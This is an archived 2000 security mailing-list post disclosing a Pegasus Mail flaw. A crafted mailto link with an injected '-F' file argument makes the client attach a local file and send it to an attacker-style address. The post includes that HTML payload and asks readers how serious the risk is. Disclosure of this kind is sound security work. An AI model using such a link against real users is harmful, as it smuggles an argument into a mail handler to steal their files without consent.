|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Pegasus Mail
From: Imran Ghory (ImranG
BTINTERNET.COM)Date: Mon Oct 02 2000 - 16:45:26 CDT
- Next message: Marcelo Lamoglia: "CyberWall"
- Previous message: Peter Pentchev: "Re: C versus other languages, round 538 or so (Re: CGI scriptsinsh)"
- Next in thread: Peter Pentchev: "Re: Pegasus Mail"
- Reply: Peter Pentchev: "Re: Pegasus Mail"
- Reply: Helmut Springer: "Re: Pegasus Mail"
- Reply: H D Moore: "Re: Pegasus Mail"
- Reply: Knud Erik Hojgaard - CyberCity Support: "Re: Pegasus Mail"
- Reply: Bernie Cosell: "Re: Pegasus Mail"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
When using the following html,
<a href="mailto:hackerhakersite.com -F c:\test.txt"> Click
here</a>
When the user clicks on "Click here" Pegasus mail will
automatically creates a message which has a copy of the file
"c:\test.txt" and is addressed to "hackerhakersite.com" and
queues it ready to be sent without any further user intervention.
If instead of "hackerhakersite.com" we have a local user,
"hacker" the message won't be queued but just sent immediately.
As inorder to have files stolen the user would have to click on the
dubious looking link, is this security risk serious ?
Imran Ghory
- Next message: Marcelo Lamoglia: "CyberWall"
- Previous message: Peter Pentchev: "Re: C versus other languages, round 538 or so (Re: CGI scriptsinsh)"
- Next in thread: Peter Pentchev: "Re: Pegasus Mail"
- Reply: Peter Pentchev: "Re: Pegasus Mail"
- Reply: Helmut Springer: "Re: Pegasus Mail"
- Reply: H D Moore: "Re: Pegasus Mail"
- Reply: Knud Erik Hojgaard - CyberCity Support: "Re: Pegasus Mail"
- Reply: Bernie Cosell: "Re: Pegasus Mail"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]